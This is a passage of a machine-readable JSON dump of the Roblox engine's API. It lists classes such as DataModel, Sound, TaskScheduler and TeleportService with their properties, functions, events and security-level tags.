stance","Arguments":[{"Type":"string","Name":"className","Default":null}],"Name":"getService","tags":["deprecated"],"Class":"ServiceProvider","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"string","Name":"className","Default":null}],"Name":"service","tags":["deprecated"],"Class":"ServiceProvider","type":"Function"},{"Arguments":[],"Name":"Close","tags":[],"Class":"ServiceProvider","type":"Event"},{"Arguments":[],"Name":"CloseLate","tags":["LocalUserSecurity"],"Class":"ServiceProvider","type":"Event"},{"Arguments":[{"Name":"service","Type":"Instance"}],"Name":"ServiceAdded","tags":[],"Class":"ServiceProvider","type":"Event"},{"Arguments":[{"Name":"service","Type":"Instance"}],"Name":"ServiceRemoving","tags":[],"Class":"ServiceProvider","type":"Event"},{"Superclass":"ServiceProvider","type":"Class","Name":"DataModel","tags":[]},{"ValueType":"int","type":"Property","Name":"CreatorId","tags":["readonly"],"Class":"DataModel"},{"ValueType":"CreatorType","type":"Property","Name":"CreatorType","tags":["readonly"],"Class":"DataModel"},{"ValueType":"GearGenreSetting","type":"Property","Name":"GearGenreSetting","tags":["readonly"],"Class":"DataModel"},{"ValueType":"Genre","type":"Property","Name":"Genre","tags":["readonly"],"Class":"DataModel"},{"ValueType":"bool","type":"Property","Name":"IsPersonalServer","tags":["RobloxScriptSecurity"],"Class":"DataModel"},{"ValueType":"string","type":"Property","Name":"JobId","tags":["readonly"],"Class":"DataModel"},{"ValueType":"bool","type":"Property","Name":"LocalSaveEnabled","tags":["RobloxScriptSecurity","readonly"],"Class":"DataModel"},{"ValueType":"int","type":"Property","Name":"PlaceId","tags":["readonly"],"Class":"DataModel"},{"ValueType":"int","type":"Property","Name":"PlaceVersion","tags":["readonly"],"Class":"DataModel"},{"ValueType":"string","type":"Property","Name":"VIPServerId","tags":["readonly"],"Class":"DataModel"},{"ValueType":"int","type":"Property","Name":"VIPServerOwnerId","tags":["readonly"],"Class":"DataModel"},{"ValueType":"Object","type":"Property","Name":"Workspace","tags":["readonly"],"Class":"DataModel"},{"ValueType":"Object","type":"Property","Name":"lighting","tags":["deprecated","readonly"],"Class":"DataModel"},{"ValueType":"Object","type":"Property","Name":"workspace","tags":["deprecated","readonly"],"Class":"DataModel"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"displayName","Default":null},{"Type":"string","Name":"stat","Default":null}],"Name":"AddStat","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"ClearMessage","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"localSave","Default":null}],"Name":"FinishShutdown","tags":["RobloxScriptSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"double","Arguments":[{"Type":"string","Name":"jobname","Default":null},{"Type":"double","Name":"greaterThan","Default":null}],"Name":"GetJobIntervalPeakFraction","tags":["PluginSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"double","Arguments":[{"Type":"string","Name":"jobname","Default":null},{"Type":"double","Name":"greaterThan","Default":null}],"Name":"GetJobTimePeakFraction","tags":["PluginSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"Array","Arguments":[],"Name":"GetJobsExtendedStats","tags":["PluginSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"Array","Arguments":[],"Name":"GetJobsInfo","tags":["PluginSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"string","Arguments":[],"Name":"GetMessage","tags":[],"Class":"DataModel","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"GetRemoteBuildMode","tags":[],"Class":"DataModel","type":"Function"},{"ReturnType":"string","Arguments":[{"Type":"string","Name":"url","Default":null},{"Type":"bool","Name":"synchronous","Default":"false"}],"Name":"HttpGet","tags":["RobloxScriptSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"string","Arguments":[{"Type":"string","Name":"url","Default":null},{"Type":"string","Name":"data","Default":null},{"Type":"bool","Name":"synchronous","Default":"false"},{"Type":"string","Name":"contentType","Default":"*/*"}],"Name":"HttpPost","tags":["RobloxScriptSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"GearType","Name":"gearType","Default":null}],"Name":"IsGearTypeAllowed","tags":[],"Class":"DataModel","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"IsLoaded","tags":[],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Content","Name":"url","Default":null}],"Name":"Load","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"assetID","Default":null}],"Name":"LoadGame","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"LoadPlugins","tags":["RobloxSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"assetID","Default":null}],"Name":"LoadWorld","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"stat","Default":null}],"Name":"RemoveStat","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"category","Default":null},{"Type":"string","Name":"action","Default":"custom"},{"Type":"string","Name":"label","Default":"none"},{"Type":"int","Name":"value","Default":"0"}],"Name":"ReportInGoogleAnalytics","tags":["RobloxScriptSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"id","Default":null},{"Type":"string","Name":"key1","Default":null},{"Type":"string","Name":"value1","Default":null},{"Type":"string","Name":"key2","Default":null},{"Type":"string","Name":"value2","Default":null}],"Name":"ReportMeasurement","tags":["RobloxScriptSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Content","Name":"url","Default":null}],"Name":"Save","tags":["RobloxSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"SaveStats","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"ServerSave","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"creatorID","Default":null},{"Type":"CreatorType","Name":"creatorType","Default":null}],"Name":"SetCreatorID","tags":["PluginSecurity","deprecated"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"creatorId","Default":null},{"Type":"CreatorType","Name":"creatorType","Default":null}],"Name":"SetCreatorId","tags":["PluginSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"GearGenreSetting","Name":"genreRestriction","Default":null},{"Type":"int","Name":"allowedGenres","Default":null}],"Name":"SetGearSettings","tags":["PluginSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Genre","Name":"genre","Default":null}],"Name":"SetGenre","tags":["PluginSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"double","Name":"seconds","Default":null}],"Name":"SetJobsExtendedStatsWindow","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"message","Default":null}],"Name":"SetMessage","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"SetMessageBrickCount","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"placeID","Default":null},{"Type":"bool","Name":"robloxPlace","Default":"false"}],"Name":"SetPlaceID","tags":["PluginSecurity","deprecated"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"placeId","Default":null},{"Type":"bool","Name":"robloxPlace","Default":"false"}],"Name":"SetPlaceId","tags":["PluginSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"placeId","Default":null}],"Name":"SetPlaceVersion","tags":["PluginSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"buildModeEnabled","Default":null}],"Name":"SetRemoteBuildMode","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"info","Default":null}],"Name":"SetScreenshotInfo","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetServerSaveUrl","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"universeId","Default":null}],"Name":"SetUniverseId","tags":["PluginSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"newId","Default":null}],"Name":"SetVIPServerId","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"newId","Default":null}],"Name":"SetVIPServerOwnerId","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"info","Default":null}],"Name":"SetVideoInfo","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Shutdown","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"ToggleTools","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"string","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"HttpGetAsync","tags":["RobloxScriptSecurity"],"Class":"DataModel","type":"YieldFunction"},{"ReturnType":"string","Arguments":[{"Type":"string","Name":"url","Default":null},{"Type":"string","Name":"data","Default":null},{"Type":"string","Name":"contentType","Default":"*/*"}],"Name":"HttpPostAsync","tags":["RobloxScriptSecurity"],"Class":"DataModel","type":"YieldFunction"},{"ReturnType":"bool","Arguments":[{"Type":"SaveFilter","Name":"saveFilter","Default":"SaveAll"}],"Name":"SavePlace","tags":[],"Class":"DataModel","type":"YieldFunction"},{"ReturnType":"bool","Arguments":[],"Name":"SaveToRoblox","tags":["RobloxScriptSecurity"],"Class":"DataModel","type":"YieldFunction"},{"Arguments":[],"Name":"AllowedGearTypeChanged","tags":[],"Class":"DataModel","type":"Event"},{"Arguments":[{"Name":"betterQuality","Type":"bool"}],"Name":"GraphicsQualityChangeRequest","tags":[],"Class":"DataModel","type":"Event"},{"Arguments":[{"Name":"object","Type":"Instance"},{"Name":"descriptor","Type":"Property"}],"Name":"ItemChanged","tags":[],"Class":"DataModel","type":"Event"},{"Arguments":[],"Name":"Loaded","tags":[],"Class":"DataModel","type":"Event"},{"ReturnType":"Tuple","Arguments":[],"Name":"OnClose","tags":[],"Class":"DataModel","type":"Callback"},{"ReturnType":"bool","Arguments":[],"Name":"RequestShutdown","tags":["RobloxScriptSecurity","noyield"],"Class":"DataModel","type":"Callback"},{"Superclass":"ServiceProvider","type":"Class","Name":"GenericSettings","tags":[]},{"Superclass":"GenericSettings","type":"Class","Name":"GlobalSettings","tags":["notbrowsable"]},{"ReturnType":"bool","Arguments":[{"Type":"string","Name":"name","Default":null}],"Name":"GetFFlag","tags":[],"Class":"GlobalSettings","type":"Function"},{"ReturnType":"string","Arguments":[{"Type":"string","Name":"name","Default":null}],"Name":"GetFVariable","tags":[],"Class":"GlobalSettings","type":"Function"},{"ReturnType":"Dictionary","Arguments":[],"Name":"GetFVariables","tags":["RobloxScriptSecurity"],"Class":"GlobalSettings","type":"Function"},{"Superclass":"GenericSettings","type":"Class","Name":"UserSettings","tags":[]},{"ReturnType":"bool","Arguments":[{"Type":"string","Name":"name","Default":null}],"Name":"IsUserFeatureEnabled","tags":[],"Class":"UserSettings","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Reset","tags":[],"Class":"UserSettings","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"Sky","tags":[]},{"ValueType":"bool","type":"Property","Name":"CelestialBodiesShown","tags":[],"Class":"Sky"},{"ValueType":"Content","type":"Property","Name":"SkyboxBk","tags":[],"Class":"Sky"},{"ValueType":"Content","type":"Property","Name":"SkyboxDn","tags":[],"Class":"Sky"},{"ValueType":"Content","type":"Property","Name":"SkyboxFt","tags":[],"Class":"Sky"},{"ValueType":"Content","type":"Property","Name":"SkyboxLf","tags":[],"Class":"Sky"},{"ValueType":"Content","type":"Property","Name":"SkyboxRt","tags":[],"Class":"Sky"},{"ValueType":"Content","type":"Property","Name":"SkyboxUp","tags":[],"Class":"Sky"},{"ValueType":"int","type":"Property","Name":"StarCount","tags":[],"Class":"Sky"},{"Superclass":"Instance","type":"Class","Name":"Smoke","tags":[]},{"ValueType":"Color3","type":"Property","Name":"Color","tags":[],"Class":"Smoke"},{"ValueType":"bool","type":"Property","Name":"Enabled","tags":[],"Class":"Smoke"},{"ValueType":"float","type":"Property","Name":"Opacity","tags":[],"Class":"Smoke"},{"ValueType":"float","type":"Property","Name":"RiseVelocity","tags":[],"Class":"Smoke"},{"ValueType":"float","type":"Property","Name":"Size","tags":[],"Class":"Smoke"},{"Superclass":"Instance","type":"Class","Name":"SocialService","tags":[]},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"bestFriendUrl","Default":null}],"Name":"SetBestFriendUrl","tags":["LocalUserSecurity"],"Class":"SocialService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"friendUrl","Default":null}],"Name":"SetFriendUrl","tags":["LocalUserSecurity"],"Class":"SocialService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"groupRankUrl","Default":null}],"Name":"SetGroupRankUrl","tags":["LocalUserSecurity"],"Class":"SocialService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"groupRoleUrl","Default":null}],"Name":"SetGroupRoleUrl","tags":["LocalUserSecurity"],"Class":"SocialService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"groupUrl","Default":null}],"Name":"SetGroupUrl","tags":["LocalUserSecurity"],"Class":"SocialService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"stuffUrl","Default":null}],"Name":"SetPackageContentsUrl","tags":["LocalUserSecurity"],"Class":"SocialService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"stuffUrl","Default":null}],"Name":"SetStuffUrl","tags":["LocalUserSecurity"],"Class":"SocialService","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"Sound","tags":[]},{"ValueType":"bool","type":"Property","Name":"IsPaused","tags":["readonly"],"Class":"Sound"},{"ValueType":"bool","type":"Property","Name":"IsPlaying","tags":["readonly"],"Class":"Sound"},{"ValueType":"bool","type":"Property","Name":"Looped","tags":[],"Class":"Sound"},{"ValueType":"float","type":"Property","Name":"MaxDistance","tags":[],"Class":"Sound"},{"ValueType":"float","type":"Property","Name":"MinDistance","tags":[],"Class":"Sound"},{"ValueType":"float","type":"Property","Name":"Pitch","tags":[],"Class":"Sound"},{"ValueType":"bool","type":"Property","Name":"PlayOnRemove","tags":[],"Class":"Sound"},{"ValueType":"Content","type":"Property","Name":"SoundId","tags":[],"Class":"Sound"},{"ValueType":"double","type":"Property","Name":"TimeLength","tags":["readonly"],"Class":"Sound"},{"ValueType":"double","type":"Property","Name":"TimePosition","tags":[],"Class":"Sound"},{"ValueType":"float","type":"Property","Name":"Volume","tags":[],"Class":"Sound"},{"ValueType":"bool","type":"Property","Name":"isPlaying","tags":["deprecated","readonly"],"Class":"Sound"},{"ReturnType":"void","Arguments":[],"Name":"Pause","tags":[],"Class":"Sound","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Play","tags":[],"Class":"Sound","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Resume","tags":[],"Class":"Sound","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Stop","tags":[],"Class":"Sound","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"pause","tags":["deprecated"],"Class":"Sound","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"play","tags":["deprecated"],"Class":"Sound","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"stop","tags":["deprecated"],"Class":"Sound","type":"Function"},{"Arguments":[{"Name":"soundId","Type":"string"},{"Name":"numOfTimesLooped","Type":"int"}],"Name":"DidLoop","tags":[],"Class":"Sound","type":"Event"},{"Arguments":[{"Name":"soundId","Type":"string"}],"Name":"Ended","tags":[],"Class":"Sound","type":"Event"},{"Arguments":[{"Name":"soundId","Type":"string"}],"Name":"Paused","tags":[],"Class":"Sound","type":"Event"},{"Arguments":[{"Name":"soundId","Type":"string"}],"Name":"Played","tags":[],"Class":"Sound","type":"Event"},{"Arguments":[{"Name":"soundId","Type":"string"}],"Name":"Stopped","tags":[],"Class":"Sound","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"SoundService","tags":["notCreatable"]},{"ValueType":"ReverbType","type":"Property","Name":"AmbientReverb","tags":[],"Class":"SoundService"},{"ValueType":"float","type":"Property","Name":"DistanceFactor","tags":[],"Class":"SoundService"},{"ValueType":"float","type":"Property","Name":"DopplerScale","tags":[],"Class":"SoundService"},{"ValueType":"float","type":"Property","Name":"RolloffScale","tags":[],"Class":"SoundService"},{"ReturnType":"Tuple","Arguments":[],"Name":"GetListener","tags":[],"Class":"SoundService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"SoundType","Name":"sound","Default":null}],"Name":"PlayStockSound","tags":["RobloxScriptSecurity"],"Class":"SoundService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"ListenerType","Name":"listenerType","Default":null},{"Type":"Tuple","Name":"listener","Default":null}],"Name":"SetListener","tags":[],"Class":"SoundService","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"Sparkles","tags":[]},{"ValueType":"Color3","type":"Property","Name":"Color","tags":["hidden"],"Class":"Sparkles"},{"ValueType":"bool","type":"Property","Name":"Enabled","tags":[],"Class":"Sparkles"},{"ValueType":"Color3","type":"Property","Name":"SparkleColor","tags":[],"Class":"Sparkles"},{"Superclass":"Instance","type":"Class","Name":"SpawnerService","tags":[]},{"Superclass":"Instance","type":"Class","Name":"StarterGear","tags":[]},{"Superclass":"Instance","type":"Class","Name":"StarterPlayer","tags":[]},{"ValueType":"bool","type":"Property","Name":"AutoJumpEnabled","tags":[],"Class":"StarterPlayer"},{"ValueType":"float","type":"Property","Name":"CameraMaxZoomDistance","tags":[],"Class":"StarterPlayer"},{"ValueType":"float","type":"Property","Name":"CameraMinZoomDistance","tags":[],"Class":"StarterPlayer"},{"ValueType":"CameraMode","type":"Property","Name":"CameraMode","tags":[],"Class":"StarterPlayer"},{"ValueType":"DevCameraOcclusionMode","type":"Property","Name":"DevCameraOcclusionMode","tags":[],"Class":"StarterPlayer"},{"ValueType":"DevComputerCameraMovementMode","type":"Property","Name":"DevComputerCameraMovementMode","tags":[],"Class":"StarterPlayer"},{"ValueType":"DevComputerMovementMode","type":"Property","Name":"DevComputerMovementMode","tags":[],"Class":"StarterPlayer"},{"ValueType":"DevTouchCameraMovementMode","type":"Property","Name":"DevTouchCameraMovementMode","tags":[],"Class":"StarterPlayer"},{"ValueType":"DevTouchMovementMode","type":"Property","Name":"DevTouchMovementMode","tags":[],"Class":"StarterPlayer"},{"ValueType":"bool","type":"Property","Name":"EnableMouseLockOption","tags":[],"Class":"StarterPlayer"},{"ValueType":"float","type":"Property","Name":"HealthDisplayDistance","tags":[],"Class":"StarterPlayer"},{"ValueType":"bool","type":"Property","Name":"LoadCharacterAppearance","tags":[],"Class":"StarterPlayer"},{"ValueType":"float","type":"Property","Name":"NameDisplayDistance","tags":[],"Class":"StarterPlayer"},{"Superclass":"Instance","type":"Class","Name":"StarterPlayerScripts","tags":[]},{"Superclass":"StarterPlayerScripts","type":"Class","Name":"StarterCharacterScripts","tags":[]},{"Superclass":"Instance","type":"Class","Name":"Stats","tags":["notCreatable"]},{"ValueType":"double","type":"Property","Name":"MinReportInterval","tags":["RobloxScriptSecurity"],"Class":"Stats"},{"ValueType":"string","type":"Property","Name":"ReporterType","tags":["RobloxScriptSecurity"],"Class":"Stats"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"category","Default":null},{"Type":"Dictionary","Name":"data","Default":null}],"Name":"Report","tags":["RobloxScriptSecurity"],"Class":"Stats","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"ReportJobsStepWindow","tags":["RobloxScriptSecurity"],"Class":"Stats","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"includeJobs","Default":"false"}],"Name":"ReportTaskScheduler","tags":["RobloxScriptSecurity"],"Class":"Stats","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetReportUrl","tags":["RobloxScriptSecurity"],"Class":"Stats","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"StatsItem","tags":[]},{"ReturnType":"double","Arguments":[],"Name":"GetValue","tags":["PluginSecurity"],"Class":"StatsItem","type":"Function"},{"ReturnType":"string","Arguments":[],"Name":"GetValueString","tags":["PluginSecurity"],"Class":"StatsItem","type":"Function"},{"Superclass":"StatsItem","type":"Class","Name":"ProfilingItem","tags":[]},{"ReturnType":"Tuple","Arguments":[{"Type":"double","Name":"window","Default":"0"}],"Name":"GetTimes","tags":["PluginSecurity"],"Class":"ProfilingItem","type":"Function"},{"ReturnType":"Tuple","Arguments":[{"Type":"int","Name":"frames","Default":"1"}],"Name":"GetTimesForFrames","tags":["PluginSecurity"],"Class":"ProfilingItem","type":"Function"},{"Superclass":"StatsItem","type":"Class","Name":"RunningAverageItemDouble","tags":[]},{"Superclass":"StatsItem","type":"Class","Name":"RunningAverageItemInt","tags":[]},{"Superclass":"StatsItem","type":"Class","Name":"RunningAverageTimeIntervalItem","tags":[]},{"Superclass":"StatsItem","type":"Class","Name":"TotalCountTimeIntervalItem","tags":[]},{"Superclass":"Instance","type":"Class","Name":"StringValue","tags":[]},{"ValueType":"string","type":"Property","Name":"Value","tags":[],"Class":"StringValue"},{"Arguments":[{"Name":"value","Type":"string"}],"Name":"Changed","tags":[],"Class":"StringValue","type":"Event"},{"Arguments":[{"Name":"value","Type":"string"}],"Name":"changed","tags":["deprecated"],"Class":"StringValue","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"StudioTool","tags":[]},{"ValueType":"bool","type":"Property","Name":"Enabled","tags":[],"Class":"StudioTool"},{"Arguments":[],"Name":"Activated","tags":[],"Class":"StudioTool","type":"Event"},{"Arguments":[],"Name":"Deactivated","tags":[],"Class":"StudioTool","type":"Event"},{"Arguments":[{"Name":"mouse","Type":"Instance"}],"Name":"Equipped","tags":[],"Class":"StudioTool","type":"Event"},{"Arguments":[],"Name":"Unequipped","tags":[],"Class":"StudioTool","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"TaskScheduler","tags":[]},{"ValueType":"bool","type":"Property","Name":"AreArbitersThrottled","tags":[],"Class":"TaskScheduler"},{"ValueType":"ConcurrencyModel","type":"Property","Name":"Concurrency","tags":[],"Class":"TaskScheduler"},{"ValueType":"double","type":"Property","Name":"NumRunningJobs","tags":["readonly"],"Class":"TaskScheduler"},{"ValueType":"double","type":"Property","Name":"NumSleepingJobs","tags":["readonly"],"Class":"TaskScheduler"},{"ValueType":"double","type":"Property","Name":"NumWaitingJobs","tags":["readonly"],"Class":"TaskScheduler"},{"ValueType":"PriorityMethod","type":"Property","Name":"PriorityMethod","tags":[],"Class":"TaskScheduler"},{"ValueType":"double","type":"Property","Name":"SchedulerDutyCycle","tags":["readonly"],"Class":"TaskScheduler"},{"ValueType":"double","type":"Property","Name":"SchedulerRate","tags":["readonly"],"Class":"TaskScheduler"},{"ValueType":"SleepAdjustMethod","type":"Property","Name":"SleepAdjustMethod","tags":[],"Class":"TaskScheduler"},{"ValueType":"double","type":"Property","Name":"ThreadAffinity","tags":["readonly"],"Class":"TaskScheduler"},{"ValueType":"ThreadPoolConfig","type":"Property","Name":"ThreadPoolConfig","tags":[],"Class":"TaskScheduler"},{"ValueType":"int","type":"Property","Name":"ThreadPoolSize","tags":["readonly"],"Class":"TaskScheduler"},{"ValueType":"double","type":"Property","Name":"ThrottledJobSleepTime","tags":[],"Class":"TaskScheduler"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"exclusive","Default":"true"},{"Type":"double","Name":"fps","Default":"30"}],"Name":"AddDummyJob","tags":["LocalUserSecurity"],"Class":"TaskScheduler","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"double","Name":"timeSlice","Default":null},{"Type":"int","Name":"numShare","Default":null}],"Name":"SetThreadShare","tags":["LocalUserSecurity","deprecated"],"Class":"TaskScheduler","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"Team","tags":[]},{"ValueType":"bool","type":"Property","Name":"AutoAssignable","tags":[],"Class":"Team"},{"ValueType":"bool","type":"Property","Name":"AutoColorCharacters","tags":["deprecated"],"Class":"Team"},{"ValueType":"int","type":"Property","Name":"Score","tags":["deprecated"],"Class":"Team"},{"ValueType":"BrickColor","type":"Property","Name":"TeamColor","tags":[],"Class":"Team"},{"Superclass":"Instance","type":"Class","Name":"Teams","tags":["notCreatable"]},{"ReturnType":"Objects","Arguments":[],"Name":"GetTeams","tags":[],"Class":"Teams","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"RebalanceTeams","tags":["deprecated"],"Class":"Teams","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"TeleportService","tags":[]},{"ValueType":"bool","type":"Property","Name":"CustomizedTeleportUI","tags":["deprecated"],"Class":"TeleportService"},{"ReturnType":"Variant","Arguments":[],"Name":"GetLocalPlayerTeleportData","tags":[],"Class":"TeleportService","type":"Function"},{"ReturnType":"Variant","Arguments":[{"Type":"string","Name":"setting","Default":null}],"Name":"GetTeleportSetting","tags":[],"Class":"TeleportService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"setting","Default":null},{"Type":"Variant","Name":"value","Default":null}],"Name":"SetTeleportSetting","tags":[],"Class":"TeleportService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"placeId","Default":null},{"Type":"Instance","Name":"player","Default":"nil"},{"Type":"Variant","Name":"teleportData","Default":null},{"Type":"Instance","Name":"customLoadingScreen","Default":"nil"}],"Name":"Teleport","tags":[],"Class":"TeleportService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"TeleportCancel","tags":["RobloxScriptSecurity"],"Class":"TeleportService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"placeId","Default":null},{"Type":"string","Name":"instanceId","Default":null},{"Type":"Instance","Name":"player","Default":"nil"},{"Type":"string","Name":"spawnName","Default":""},{"Type":"Variant","Name":"teleportData","Default":null},{"Type":"Instance","Name":"customLoadingScreen","Default":"nil"}],"Name":"TeleportToPlaceInstance","tags":[],"Class":"TeleportService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"placeId","Default":null},{"Type":"string","Name":"reservedServerAccessCode","Default":null},{"Type":"Objects","Name":"players","Default":null},{"Type":"string","Name":"spawnName","Default":""},{"Type":"Variant","Name":"teleportData","Default":null},{"Type":"Instance","Name":"customLoadingScreen","Default":"nil"}],"Name":"TeleportToPrivateServer","tags":[],"Class":"TeleportService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"placeId","Default":null},{"Type":"string","Name":"spawnName","Default":null},{"Type":"Instance","Name":"player","Default":"nil"},{"Type":"Variant","Name":"teleportData","Default":null},{"Type":"Instance","Name":"customLoadingScreen","Default":"nil"}],"Name":"TeleportToSpawnByName","tags":[],"Class":"TeleportService","type":"Function"},{"ReturnType":"Tuple","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"GetPlayerPlaceInstanceAsync","tags":[],"Class":"TeleportService","type":"YieldFunction"},{"ReturnType":"string","Arguments":[{"Type":"int","Name":"placeId","Default":null}],"Name":"ReserveServer","tags":[],"Class":"TeleportService","type":"YieldFunction"},{"Arguments":[{"Name":"loadingGui","Type":"Instance"},{"Name":"dataTable","Type":"Variant"}],"Name":"LocalPlayerArrivedFromTeleport","tags":[],"Class":"TeleportService","type":"Event"},{"ReturnType":"bool","Arguments":[{"Name":"message","Type":"string"},{"Name":"placeId","Type":"int"},{"Name":"spawnName","Type":"string"}],"Name":"ConfirmationCallback","tags":["RobloxScriptSecurity","noyield"],"Class":"TeleportService","type":"Callback"},{"ReturnType":"void","Arguments":[{"Name":"message","Type":"string"}],"Name":"ErrorCallback","tags":["RobloxScriptSecurity","noyield"],"Class":"TeleportService","type":"Callback"},{"Superclass":"Instance","type":"Class","Name":"TerrainRegion","tags":[]},{"ValueType":"bool","type":"Property","Name":"IsSmooth","tags":["readonly"],"Class":"TerrainRegion"},{"ValueType":"Vector3","type":"Property","Name":"SizeInCells","tags":["readonly"],"Class":"TerrainRegion"},{"ReturnType":"void","Arguments":[],"Name":"ConvertToSmooth","tags":["PluginSecurity"],"Class":"TerrainRegion","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"TestService","tags":[]},{"ValueType":"bool","type":"Property","Name":"AutoRuns","tags":[],"Class":"TestService"},{"ValueType":"string","type":"Property","Name":"Description","tags":[],"Class":"TestService"},{"ValueType":"int","type":"Property","Name":"ErrorCount","tags":["readonly"],"Class":"TestService"},{"ValueType":"bool","type":"Property","Name":"Is30FpsThrottleEnabled","tags":[],"Class":"TestService"},{"ValueType":"bool","type":"Property","Name":"IsPhysicsEnvironmentalThrottled","tags":[],"Class":"TestService"},{"ValueType":"bool","type":"Property","Name":"IsSleepAllowed","tags":[],"Class":"TestService"},{"ValueType":"int","type":"Property","Name":"NumberOfPlayers","tags"